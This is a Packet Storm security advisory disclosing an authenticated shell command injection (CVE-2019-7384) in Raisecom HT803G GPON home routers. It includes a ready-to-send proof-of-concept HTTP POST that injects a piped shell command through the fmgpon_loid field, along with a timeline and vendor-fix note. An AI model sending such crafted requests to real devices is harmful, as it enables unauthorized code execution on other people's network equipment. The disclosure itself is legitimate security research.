what you don't know can hurt you

Raisecom Technology GPON-ONU HT803G-07 Command Injection

Raisecom Technology GPON-ONU HT803G-07 Command Injection
Posted Feb 13, 2019
Authored by Kaustubh G. Padwad

Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the fmgpon_loid parameter.

tags | exploit
advisories | CVE-2019-7384
MD5 | a7b4b967b526835e031e08633772389a

Raisecom Technology GPON-ONU HT803G-07 Command Injection

Change Mirror Download
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384.
Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description:
============

An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version
ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional_information
======================

The value of fmgpon_loid parameter is parse to system call in implimentation of application code inside boa binary and since their is no user input validation this leads to authenticated code execution on device


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
Local


Impact Code execution
=====================
true

Attack Vectors
==============
To exploit this vulnerability one must have to visit the crafted page or have to parse the proper crafted request to the device



How to Reproduce: (POC):
========================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/gpon.asp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure:
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor
10-Dec-2018 Recived confirmation from vendor regarding fix
04-JAN-2019 Request for the CVE-ID
04-FEB-2018: CVE assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    7 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close